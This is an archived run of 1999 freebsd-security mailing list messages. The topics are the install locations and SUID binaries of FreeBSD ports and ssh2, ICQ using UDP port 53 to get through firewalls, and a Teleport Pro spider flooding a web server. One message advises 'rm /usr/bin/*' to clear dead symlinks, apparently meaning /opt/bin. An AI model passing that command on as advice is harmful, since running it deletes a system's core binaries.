In-Reply-To: <19990603104521.I58665@wopr.caltech.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 3 Jun 1999, Matthew Hunt wrote: > On Thu, Jun 03, 1999 at 02:40:01PM +0000, Unknow User wrote: > > The problem is that we never now what SUID, port will install! > > It happens that other has the same "false sense of security" i have: > > You smoke crack. Just another crack expert on this list... 8() > How do you know what SUID binaries any software will install? You > read the source! You can do exactly the same for the Ports Collection. > It's all plain English (or at least plain Makefile) for your perusal. I usually read the Makefile, rather than the source. I also keep a 'tee' of the output from the various make phases. When you install something that is SUID, you will usually hear about it in your nightly mail, another really nice feature of FreeBSD. I can't count how many times I've seen the mail from customer firewalls and been able to remotely diagnose duplicate client IP addresses from the ARP jumps... > I think you need to learn how the Ports Collection works before you > condemn it. You clearly do not understand it all. The ports collection just flat rocks! It's the only thing better than packages. I frequently use the ports to take the first whack at something before I port it to AIX or Linux. My FreeBSD laptop is a good porting tool - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 2: 3: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 836F314A09 for ; Fri, 4 Jun 1999 02:03:06 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id LAA03247 for ; Fri, 4 Jun 1999 11:03:03 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: security@freebsd.org Subject: icq using udp port 53 ?? From: Poul-Henning Kamp Date: Fri, 04 Jun 1999 11:03:03 +0200 Message-ID: <3245.928486983@critter.freebsd.dk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It seems like the ICQ people have started to use udp src port 53 to circumvent firewalls :-( -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 2: 6:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id E2A6114A09; Fri, 4 Jun 1999 02:06:09 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA28101; Fri, 4 Jun 1999 13:06:13 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 4 Jun 1999 13:05:16 +0400 Received: from undisclosed-intranet-sender id xma019712; Fri, 4 Jun 99 13:05:16 +0400 Date: Fri, 4 Jun 1999 13:05:03 +0400 Message-Id: <199906040905.NAA10997@paranoid.eltex.spb.ru> In-Reply-To: <3245.928486983@critter.freebsd.dk> from "Poul-Henning Kamp " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: icq using udp port 53 ?? To: phk@FreeBSD.ORG Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, You can use forwarding named as proxy.. Poul-Henning Kamp said : > It seems like the ICQ people have started to use udp src port 53 to > circumvent firewalls :-( _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN1eWvqH/mIJW9LeBAQHgKgP9GM5QrEyO/z45ANmTI1xJk5cgN+N8sr8f O8kZJyiZTtEpTYa+WrgRE0bdtYNj3blPFYMcMM4HV0Q8D/XWIZMkkrJgy/CDnwv3 Qa84a8mwxmxSVugMtyaXl7m/MwZSHRIeSlWrklua6uDvQasaztB5Mr57NIPsqbia fdq7sNNMqwM= =eZzH -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 8:19:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id 10A9215564 for ; Fri, 4 Jun 1999 08:19:09 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id IAA19422 for ; Fri, 4 Jun 1999 08:19:10 -0700 (PDT) Date: Fri, 4 Jun 1999 08:19:08 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >The problem is that we never now what SUID, port will install! Not only "what SUID" but "where" as well. Ports may be one the best things about FreeBSD but there's still _plenty_ of room for improvement. One thing ports don't do well is install themselves in predictable locations. Instead you'll find them installing files in /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, /var, etc. When I install ssh2 I want it all under /usr/local/ssh. This alone is a good reason to use ports sparingly (after reviewing the patches). This might not seem like a big deal on end-user or non-production systems but it can be a real headache in larger environments where configuration control is important. The only other OS I know of that spreads applications so thinly across the OS is MS Windows. It also effectively prevents FreeBSD from being able to share /usr/local via NFS, as most large installations do. Solaris is the example FreeBSD should be following in this area. /usr/ports/Makefile would be a good place to enforce some predictability, and ideally prompt for things like port_root. Another thing ports don't do is tell you where they install files. "make -n install" or "make -n real-install" rarely yields any useful information. Even the post-install info in /var/db/pkg lacks detail, especially when compared with Solaris' /var/sadm. The FreeBSD operating system is a model of good development. Revision control, code review and well thought out policies make it so. Why is it ports don't receive the same attention to detail? -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 8:30:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 1BE9F153FE for ; Fri, 4 Jun 1999 08:30:10 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 96087 invoked by uid 1001); 4 Jun 1999 15:30:02 +0000 (GMT) To: marquis@roble.com Cc: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) From: sthaug@nethelp.no In-Reply-To: Your message of "Fri, 4 Jun 1999 08:19:08 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Fri, 04 Jun 1999 17:30:02 +0200 Message-ID: <96085.928510202@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > One thing ports don't do well is install themselves in predictable > locations. Instead you'll find them installing files in > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, > /var, etc. When I install ssh2 I want it all under /usr/local/ssh. > This alone is a good reason to use ports sparingly (after reviewing the > patches). Having everything under /usr/local/ssh is convenient in many way, but I don't believe there is any kind of agreement that this is *the* only correct way. Myself, I'm happy to have ssh, ssh-keygen etc. under /usr/local/bin (actually /local/bin here) and sshd under /usr/local/sbin. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 8:43:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 96A361543B for ; Fri, 4 Jun 1999 08:43:27 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with SMTP id RAA10592; Fri, 4 Jun 1999 17:41:42 +0200 (MET DST) Date: Fri, 4 Jun 1999 17:41:39 +0200 (MET DST) From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: sthaug@nethelp.no Cc: marquis@roble.com, security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <96085.928510202@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A reason that comes to mind is having /usr/local/bin on NFS and ssh not. You need it locally if you want to start sshd from rc* before NFS is mounted. The problem is however that if you want to make ports customisable you will have to duplicate part of the functionality in ./configure. Are there things like $ETCDIR, $BINDIR, $SBINDIR, etc. in use in the ports collection? That would make it possible to make the make command look like: cd /usr/ports/security/ssh2 make BASEDIR=/usr/local/ssh \ ETCDIR=/usr/local/etc Nick On Fri, 4 Jun 1999 sthaug@nethelp.no wrote: > > One thing ports don't do well is install themselves in predictable > > locations. Instead you'll find them installing files in > > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, > > /var, etc. When I install ssh2 I want it all under /usr/local/ssh. > > This alone is a good reason to use ports sparingly (after reviewing the > > patches). > > Having everything under /usr/local/ssh is convenient in many way, but > I don't believe there is any kind of agreement that this is *the* only > correct way. Myself, I'm happy to have ssh, ssh-keygen etc. under > /usr/local/bin (actually /local/bin here) and sshd under /usr/local/sbin. > > Steinar Haug, Nethelp consulting, sthaug@nethelp.no > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 8:48: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 33D41152FB for ; Fri, 4 Jun 1999 08:47:26 -0700 (PDT) (envelope-from rgrimes@gndrsh.aac.dev.com) Received: (from rgrimes@localhost) by gndrsh.aac.dev.com (8.9.3/8.9.3) id IAA21218; Fri, 4 Jun 1999 08:40:25 -0700 (PDT) (envelope-from rgrimes) From: "Rodney W. Grimes" Message-Id: <199906041540.IAA21218@gndrsh.aac.dev.com> Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <96085.928510202@verdi.nethelp.no> from "sthaug@nethelp.no" at "Jun 4, 1999 05:30:02 pm" To: sthaug@nethelp.no Date: Fri, 4 Jun 1999 15:40:25 +0000 (GMT) Cc: marquis@roble.com, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > One thing ports don't do well is install themselves in predictable > > locations. Instead you'll find them installing files in > > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, > > /var, etc. When I install ssh2 I want it all under /usr/local/ssh. What does a typical path variable look like on your systems??? Long paths are bad for shells. Yea, I know, the hashing stuff should keep a single copy of a shell pretty quick, but every time you fork off another one your going to have to go hash the path list. > > This alone is a good reason to use ports sparingly (after reviewing the > > patches). > > Having everything under /usr/local/ssh is convenient in many way, but > I don't believe there is any kind of agreement that this is *the* only > correct way. Myself, I'm happy to have ssh, ssh-keygen etc. under > /usr/local/bin (actually /local/bin here) and sshd under /usr/local/sbin. I would actually rather have sshd in /usr/local/libexec, it's not something you really run from the command line :-) -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 9: 9:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id C4D5214D34 for ; Fri, 4 Jun 1999 09:09:05 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.2) with ESMTP id MAA22134; Fri, 4 Jun 1999 12:04:19 -0400 (EDT) (envelope-from matt@zigg.com) Date: Fri, 4 Jun 1999 12:04:18 -0400 (EDT) From: Matt Behrens Reply-To: Matt Behrens , freebsd-chat@FreeBSD.ORG To: "Rodney W. Grimes" Cc: sthaug@nethelp.no, marquis@roble.com, security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <199906041540.IAA21218@gndrsh.aac.dev.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ This is not really -security related anymore. Can't think of a ] [ good place to move it so followups are directed to -chat. ] On Fri, 4 Jun 1999, Rodney W. Grimes wrote: : What does a typical path variable look like on your systems??? Long : paths are bad for shells. Yea, I know, the hashing stuff should keep : a single copy of a shell pretty quick, but every time you fork off : another one your going to have to go hash the path list. Well, why not do what I do -- I have /opt/packagename/bin, /opt/packagename/sbin, etc. and I simply do this after installing a package: cd /opt/bin;ln -s ../*/bin/* . Then we can just add /opt/bin to our paths. We still keep things nice and separate, and if we want to clean up dead symlinks, we just do rm /usr/bin/* then rerun the symlink generator. : I would actually rather have sshd in /usr/local/libexec, it's not something : you really run from the command line :-) I heartily agree with this, except I put mine in /opt/sshd/libexec with symlinks to /opt/libexec :-) In case anyone wonders why I use /opt, well, I feel /usr/local should stay the property of the actual local software that I develop. Matt Behrens Owner/Administrator, zigg.com Chief Engineer, Nameless IRC Network To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 9:25:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id C3EEF14D77 for ; Fri, 4 Jun 1999 09:25:10 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id JAA20049 for ; Fri, 4 Jun 1999 09:25:11 -0700 (PDT) Date: Fri, 4 Jun 1999 09:25:08 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <199906041540.IAA21218@gndrsh.aac.dev.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > What does a typical path variable look like on your systems??? Long > paths are bad for shells. Yea, I know, the hashing stuff should keep > a single copy of a shell pretty quick, but every time you fork off > another one your going to have to go hash the path list. For applications like ssh, with less than a couple dozen files total, we don't even bother to create subdirectories for sbin, bin, etc. The "configure" command line typically looks like: ./configure --prefix=/var/ssh --bindir=/var/ssh \ --exec-prefix=/var/ssh --sbindir=/var/ssh --sysconfdir=/var/ssh \ --with-etcdir=/var/ssh --without-rsh It would be nice if these variables could be set globally i.e., %grep PREFIX /usr/ports/Makefile PREFIX= prompt_for #PREFIX= %grep ETCDIR /usr/ports/Makefile ETCDIR= $PREFIX/etc #ETCDIR= /usr/local/etc ... Our particular setup installs under /var since /usr/local is an NFS mount. Ssh, scp and sftp are kept in user's paths with symlinks i.e.: ln -s /var/ssh/ssh /usr/local/bin/ssh ln -s /var/ssh/scp /usr/local/bin/scp ln -s /var/ssh/ssh-keygen /usr/local/bin/ssh-keygen This allows us to maintain a uniform /usr/local while accommodating local differences. It scales nicely up to several hundred hosts and reduces sysadmin overhead by orders of magnitude. -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 9:49:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 874E015363 for ; Fri, 4 Jun 1999 09:49:36 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id TAA07550; Fri, 4 Jun 1999 19:49:23 +0300 (EEST) Date: Fri, 4 Jun 1999 19:49:23 +0300 (EEST) From: Narvi To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 4 Jun 1999, Roger Marquis wrote: > >The problem is that we never now what SUID, port will install! > > Not only "what SUID" but "where" as well. Ports may be one the best > things about FreeBSD but there's still _plenty_ of room for > improvement. > > One thing ports don't do well is install themselves in predictable > locations. Instead you'll find them installing files in > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, > /var, etc. When I install ssh2 I want it all under /usr/local/ssh. > This alone is a good reason to use ports sparingly (after reviewing the > patches). > Ever tried changing the PREFIX? make PREFIX=/usr/local/ssh all install Should most probably do the trick. [snip9 > Another thing ports don't do is tell you where they install files. > "make -n install" or "make -n real-install" rarely yields any useful > information. Even the post-install info in /var/db/pkg lacks detail, > especially when compared with Solaris' /var/sadm. > That is what you have the PLIST for. > The FreeBSD operating system is a model of good development. Revision > control, code review and well thought out policies make it so. Why is > it ports don't receive the same attention to detail? > They don't? Go ahead and make a better ports system. But note that it must remain as easy to contribute as it is, the present system must be convertabloe over to it with relative ease and most importantly, it must actually change something for better. > -- > Roger Marquis > Roble Systems Consulting > http://www.roble.com/ > Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 10:38: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id 0BE9814D4E for ; Fri, 4 Jun 1999 10:38:04 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.2) with ESMTP id NAA22407; Fri, 4 Jun 1999 13:36:32 -0400 (EDT) (envelope-from matt@zigg.com) Date: Fri, 4 Jun 1999 13:36:32 -0400 (EDT) From: Matt Behrens Reply-To: Matt Behrens , freebsd-ports@FreeBSD.ORG To: Narvi Cc: Roger Marquis , security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ Followups to -ports. ] On Fri, 4 Jun 1999, Narvi wrote: : Ever tried changing the PREFIX? : : make PREFIX=/usr/local/ssh all install : : Should most probably do the trick. Yep. Works on maybe half the ports. Some override PREFIX themselves; some have commands with /usr/local hardcoded in; some packages even ignore configure command-line switches to change their paths, preferring /usr/local. : > Another thing ports don't do is tell you where they install files. : > "make -n install" or "make -n real-install" rarely yields any useful : > information. Even the post-install info in /var/db/pkg lacks detail, : > especially when compared with Solaris' /var/sadm. : That is what you have the PLIST for. The PLIST that comes out of ports is usually a pretty poor representation of what is actually installed. For fun sometime, you should try installing a lot of ports then uninstalling them. Check out what's left over in /usr/local (ignoring, of course, the locale directories and other things created by the ports system itself rather than the individual ports.) I can understand how difficult it would be to actually determine what a port did install, especially since different configurations can even generate different file manifests. I don't fault the ports people -- throwing everything into a single directory structure like they come preconfigured to do is difficult to work with and track. (Actually, I really have great respect for what the ports people do. Please, don't miscontrue me, anyone.) :-) Matt Behrens Owner/Administrator, zigg.com Chief Engineer, Nameless IRC Network To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 10:54: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp11.bellglobal.com (smtp11.bellglobal.com [204.101.251.53]) by hub.freebsd.org (Postfix) with ESMTP id 53306150A6 for ; Fri, 4 Jun 1999 10:53:52 -0700 (PDT) (envelope-from bryanf@geisha.apt.samurai.com) Received: from geisha.apt.samurai.com (HSE-TOR-ppp37150.sympatico.ca [209.226.141.217]) by smtp11.bellglobal.com (8.8.5/8.8.5) with ESMTP id NAA16007; Fri, 4 Jun 1999 13:56:40 -0400 (EDT) Received: (from bryanf@localhost) by geisha.apt.samurai.com (8.9.1a/8.9.1) id NAA01259; Fri, 4 Jun 1999 13:53:50 -0400 (EDT) Date: Fri, 4 Jun 1999 13:53:49 -0400 From: Bryan Fullerton To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990604135349.C1032@samurai.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: ; from Roger Marquis on Fri, Jun 04, 1999 at 08:19:08AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Jun 04, 1999 at 08:19:08AM -0700, Roger Marquis wrote: > >The problem is that we never now what SUID, port will install! > > Not only "what SUID" but "where" as well. Ports may be one the best > things about FreeBSD but there's still _plenty_ of room for > improvement. > > One thing ports don't do well is install themselves in predictable > locations. Instead you'll find them installing files in > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, > /var, etc. When I install ssh2 I want it all under /usr/local/ssh. > This alone is a good reason to use ports sparingly (after reviewing the > patches). Agreed, though I don't mind ssh being dropped in /usr/local/bin and /usr/local/sbin, since that's where the non-port install drops them. I do prefer the config stuff to be put in /etc/ssh2 instead of /usr/local/etc/ssh2, though - I'm not sure if this is a compile time option or not (I'll admit, I haven't checked - it's not *that* big a deal for me). However, both ssh ports are a version behind, and that version was released on May 13th. Is there an update in the pipe somewhere? Bryan -- Bryan Fullerton http://www.samurai.com/ Core Competency Samurai Consulting "No, we don't do seppuku." Can you feel the Ohmu call? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 11: 7:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 9B72A14C01; Fri, 4 Jun 1999 11:07:37 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id OAA05348; Fri, 4 Jun 1999 14:10:26 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Fri, 4 Jun 1999 14:10:26 -0400 (EDT) From: Bill Fumerola To: Matt Behrens , freebsd-ports@FreeBSD.ORG Cc: Narvi , Roger Marquis , security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 4 Jun 1999, Matt Behrens wrote: > Yep. Works on maybe half the ports. Some override PREFIX themselves; > some have commands with /usr/local hardcoded in; some packages even > ignore configure command-line switches to change their paths, > preferring /usr/local. send-pr(1) > The PLIST that comes out of ports is usually a pretty poor > representation of what is actually installed. For fun sometime, > you should try installing a lot of ports then uninstalling them. > Check out what's left over in /usr/local send-pr(1) We try to make these things conform. If you find one(s) that doesn't please tell us. It's normally a simple patch. - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 11:43:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.aussie.org (hallam.lnk.telstra.net [139.130.54.166]) by hub.freebsd.org (Postfix) with ESMTP id 2BE0D14DC8 for ; Fri, 4 Jun 1999 11:43:17 -0700 (PDT) (envelope-from cconel@aussie.org) Received: from frankenputer (dialup-b1-29.aussie.org [203.29.75.73]) by mail.aussie.org (8.9.0/8.9.0) with SMTP id EAA08014 for ; Sat, 5 Jun 1999 04:43:15 +1000 (EST) Message-Id: <199906041843.EAA08014@mail.aussie.org> From: "Chris " To: "security@FreeBSD.ORG" Date: Sat, 05 Jun 1999 04:42:40 +1000 Reply-To: "Chris" X-Mailer: PMMail 98 Standard (2.01.1600) For Windows NT (4.0.1381;4) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Net abuse/DOS with Teleport Pro ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Upon processing my logs for the past few days, I noted an anamoly with regard to one particular directory. I checked out the logs manually. During two periods over two days, a person using a agent that identified itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web server (at a rate of roughly one per second), repeatedly asking for the same (or similar) rubbish URL, as such ... /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M and a number of variations of this. All came from the same IP address. I have not used this software and am unaware of its abilities, but I am amazed that any responsible firm would distribute software that could be so easily abused in this way. What it is doing seems, to me, to be either a user doing something silly, or a bug in teleport pro (more likely the latter). Anyone seen this ? -- Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 14: 8:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from dfw-ix10.ix.netcom.com (dfw-ix10.ix.netcom.com [206.214.98.10]) by hub.freebsd.org (Postfix) with ESMTP id 17EA815B14 for ; Fri, 4 Jun 1999 14:08:53 -0700 (PDT) (envelope-from scaturan@ix.netcom.com) Received: (from smap@localhost) by dfw-ix10.ix.netcom.com (8.8.4/8.8.4) id QAA03798; Fri, 4 Jun 1999 16:07:57 -0500 (CDT) Received: from nwf-nj28-13.ix.netcom.com(198.211.22.205) by dfw-ix10.ix.netcom.com via smap (V1.3) id rma003605; Fri Jun 4 16:06:17 1999 Message-ID: <3757F92A.1AA9FA9B@ix.netcom.com> Date: Fri, 04 Jun 1999 17:04:58 +0100 From: steve caturan Organization: http://www.websytes.org X-Mailer: Mozilla 4.5 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Chris Cc: "security@FreeBSD.ORG" Subject: Re: Net abuse/DOS with Teleport Pro ? References: <199906041843.EAA08014@mail.aussie.org> Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org howdy, i believe Teleport Pro is quite similar to BlackWidow ( softbytelabs.com or softbytelab.com)..which is a "webspider". A "site leecher" basically...used by many scan-collectors to leech off pics, zip, mp3s and so on from various websites without having to necessarily use a browser. steve caturan (chye-fhut) scaturan@ix.netcom.com Chris wrote: > > Upon processing my logs for the past few days, I noted an anamoly with regard > to one particular directory. I checked out the logs manually. > > During two periods over two days, a person using a agent that identified > itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web > server (at a rate of roughly one per second), repeatedly asking for the same > (or similar) rubbish URL, as such ... > > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M > > and a number of variations of this. All came from the same IP address. > > I have not used this software and am unaware of its abilities, but I am > amazed that any responsible firm would distribute software that could be so > easily abused in this way. What it is doing seems, to me, to be either a user > doing something silly, or a bug in teleport pro (more likely the latter). > > Anyone seen this ? > > -- Chris > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 15:41:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from gulliver.net-one.it (gulliver.net-one.it [194.244.60.2]) by hub.freebsd.org (Postfix) with ESMTP id 8D8AC154A0 for ; Fri, 4 Jun 1999 15:41:46 -0700 (PDT) (envelope-from marcolin@net-one.it) Received: from python (python.net-one.it [194.244.60.148]) by gulliver.net-one.it (8.9.1a/8.9.1) with SMTP id AAA05171; Sat, 5 Jun 1999 00:40:00 -0100 (GMT) Message-Id: <4.1.19990605002350.0428cd30@pop-sa.net-one.it> X-Sender: marcolin@pop-sa.net-one.it X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sat, 05 Jun 1999 00:41:10 +0200 To: "Chris" 